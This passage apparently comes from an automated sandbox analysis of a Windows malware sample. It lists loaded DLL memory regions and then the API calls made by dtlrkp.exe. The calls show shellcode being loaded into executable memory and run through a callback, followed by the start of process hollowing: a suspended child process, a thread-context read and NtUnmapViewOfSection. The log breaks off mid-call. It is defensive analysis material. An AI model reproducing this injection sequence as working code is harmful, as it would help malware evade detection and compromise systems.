"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 406 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 407 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 408 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 409 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 410 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 411 start_va = 0x75d90000 end_va = 0x75f07fff monitored = 0 entry_point = 0x75de8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 412 start_va = 0x6c740000 end_va = 0x6c750fff monitored = 0 entry_point = 0x6c741bd0 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\SysWOW64\\wsnmp32.dll" (normalized: "c:\\windows\\syswow64\\wsnmp32.dll") Region: id = 413 start_va = 0x755c0000 end_va = 0x755cdfff monitored = 0 entry_point = 0x755c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 414 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 415 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 416 start_va = 0x76c90000 end_va = 0x76ceefff monitored = 0 entry_point = 0x76c94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 417 start_va = 0x6c6f0000 end_va = 0x6c730fff monitored = 0 entry_point = 0x6c6fe050 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 418 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 419 start_va = 0x6c190000 end_va = 0x6c1b2fff monitored = 0 entry_point = 0x6c198940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 420 start_va = 0x6c1c0000 end_va = 0x6c548fff monitored = 0 entry_point = 0x6c25cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 421 start_va = 0x6c550000 end_va = 0x6c573fff monitored = 0 entry_point = 0x6c554820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 422 start_va = 0x73e30000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73e39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 423 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 424 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 425 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 426 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 427 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 428 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 429 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 430 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 431 start_va = 0x6c110000 end_va = 0x6c18bfff monitored = 0 entry_point = 0x6c1328b0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 432 start_va = 0x71b70000 end_va = 0x71b9efff monitored = 0 entry_point = 0x71b7bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 433 start_va = 0x700c0000 end_va = 0x700dffff monitored = 0 entry_point = 0x700cd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 434 start_va = 0x70090000 end_va = 0x700bbfff monitored = 0 entry_point = 0x700abb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 435 start_va = 0x880000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 436 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 437 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 438 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 439 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 440 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 441 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 442 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 443 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 444 start_va = 0x2000000 end_va = 0x2090fff monitored = 0 entry_point = 0x2038cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 445 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 446 start_va = 0x4d0000 end_va = 0x4e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 463 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 464 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 466 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 467 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 468 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 469 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 470 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 471 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 472 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 473 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 474 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 475 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 476 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 477 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 478 start_va = 0x2000000 end_va = 0x2178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 479 start_va = 0x2180000 end_va = 0x22fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Thread: id = 5 os_tid = 0x2d4 [0142.100] __set_app_type (_Type=0x2) [0142.100] __p__fmode () returned 0x76624d6c [0142.100] __p__commode () returned 0x76625b1c [0142.101] __wgetmainargs (in: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c, _DoWildCard=0, _StartInfo=0x19ff14 | out: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c) returned 0 [0142.103] GetStartupInfoW (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0142.103] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0142.103] _wfopen (_FileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hzuplybmb"), _Mode="rb") returned 0x76621268 [0142.104] VirtualAlloc (lpAddress=0x0, dwSize=0x144a, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0142.104] fread (in: _DstBuf=0x1f0000, _ElementSize=0x144a, _Count=0x1, _File=0x76621268 | out: _DstBuf=0x1f0000*, _File=0x76621268) returned 0x1 [0142.105] EnumSystemCodePagesW (lpCodePageEnumProc=0x1f0000, dwFlags=0x0) [0142.110] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x76ed0000 [0142.110] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f7b4 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0142.110] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="q3e3yvw7kwoie" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie") returned 1 [0142.110] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\q3e3yvw7kwoie"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0142.111] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19fff [0142.111] VirtualAlloc (lpAddress=0x0, dwSize=0x19fff, flAllocationType=0x3000, flProtect=0x4) returned 0x4d0000 [0142.111] ReadFile (in: hFile=0x1e0, lpBuffer=0x4d0000, nNumberOfBytesToRead=0x19fff, lpNumberOfBytesRead=0x19fbc4, lpOverlapped=0x0 | out: lpBuffer=0x4d0000*, lpNumberOfBytesRead=0x19fbc4*=0x19fff, lpOverlapped=0x0) returned 1 [0142.113] CloseHandle (hObject=0x1e0) returned 1 [0142.146] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77460000 [0142.147] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f2b8, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe")) returned 0x2f [0142.147] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eb34, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe")) returned 0x2f [0142.147] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" [0142.147] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f210*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f274 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", lpProcessInformation=0x19f274*(hProcess=0x1e4, hThread=0x1e0, dwProcessId=0xcc4, dwThreadId=0x9c8)) returned 1 [0142.215] GetThreadContext (in: hThread=0x1e0, lpContext=0x19ef44 | out: lpContext=0x19ef44*(ContextFlags=0x10007, Dr0=0x19f038, Dr1=0x7a0, Dr2=0x1a1e64, Dr3=0x536cd652, Dr6=0x10, Dr7=0x774ba260, FloatSave.ControlWord=0x19f001, FloatSave.StatusWord=0x19f080, FloatSave.TagWord=0x1a1714, FloatSave.ErrorOffset=0xa, FloatSave.ErrorSelector=0x101efd4, FloatSave.DataOffset=0x536cd652, FloatSave.DataSelector=0x17c, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xec, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x2, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x45, [17]=0x6e, [18]=0x3c, [19]=0xf, [20]=0xc, [21]=0xf0, [22]=0x19, [23]=0x0, [24]=0x1a, [25]=0x9c, [26]=0x49, [27]=0x77, [28]=0x80, [29]=0xf0, [30]=0x19, [31]=0x0, [32]=0x38, [33]=0xf0, [34]=0x19, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x25, [41]=0x2, [42]=0x0, [43]=0xc0, [44]=0x9a, [45]=0x9d, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0xf4, [57]=0xf0, [58]=0x19, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x15, [65]=0x6e, [66]=0x3c, [67]=0xf, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x50, [73]=0x21, [74]=0x54, [75]=0x0, [76]=0xec, [77]=0xef, [78]=0x19, [79]=0x0), FloatSave.Cr0NpxState=0x54218c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x312000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x774d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf8, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x38, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x49, [23]=0x77, [24]=0xc0, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x88, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x49, [55]=0x77, [56]=0x5d, [57]=0x71, [58]=0x3c, [59]=0xf, [60]=0x0, [61]=0xf2, [62]=0x19, [63]=0x0, [64]=0x90, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf8, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x9c, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xc0, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0xf2, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x48, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x4d, [111]=0x77, [112]=0xfd, [113]=0xa0, [114]=0x70, [115]=0x78, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x49, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x4a, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf8, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xbc, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x90, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x4a, [163]=0x77, [164]=0x74, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc8, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x2c, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xcc, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x2, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0xc8, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x80, [302]=0x3e, [303]=0x0, [304]=0xd4, [305]=0x57, [306]=0x68, [307]=0xf4, [308]=0x29, [309]=0x71, [310]=0x3c, [311]=0xf, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0xc, [317]=0xf2, [318]=0x19, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x68, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x68, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x68, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0xa1, [349]=0x70, [350]=0x3c, [351]=0xf, [352]=0xec, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x49, [363]=0x77, [364]=0x14, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x88, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x49, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf2, [426]=0x19, [427]=0x0, [428]=0x50, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x49, [435]=0x77, [436]=0x0, [437]=0xf2, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x61, [445]=0x71, [446]=0x3c, [447]=0xf, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x58, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x4a, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x4a, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x50, [489]=0x21, [490]=0x54, [491]=0x0, [492]=0x84, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x50, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0142.241] ReadProcessMemory (in: hProcess=0x1e4, lpBaseAddress=0x312008, lpBuffer=0x19f288, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f288*, lpNumberOfBytesRead=0x0) returned 1 [0142.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eafc | out: Wow64Process=0x19eafc*=1) returned 1 [0142.242] lstrlenW (lpString="dtlrkp.exe") returned 10 [0142.242] lstrlenW (lpString="ntdll.dll") returned 9 [0142.242] lstrlenW (lpString="ntdll.dll") returned 9 [0142.242] lstrlenW (lpString="ntdll.dll") returned 9 [0142.242] lstrlenW (lpString="ntdll.dll") returned 9 [0142.242] lstrlenW (lpString="tdll.dll") returned 8 [0142.242] lstrlenW (lpString="dll.dll") returned 7 [0142.242] lstrlenW (lpString="ll.dll") returned 6 [0142.242] lstrlenW (lpString="l.dll") returned 5 [0142.242] lstrlenW (lpString=".dll") returned 4 [0142.243] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0142.243] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0142.243] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0142.243] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eacc, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19eacc*=0x1784a0, lpOverlapped=0x0) returned 1 [0142.320] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0142.354] CloseHandle (hObject=0x1ec) returned 1 [0142.355] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.398] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.432] NtUnmapViewOfSection (ProcessHandle=0x1e4, BaseAddress=0x400000) returned 0x0 [0142.444] VirtualAllocEx (hProcess=0x1e4, 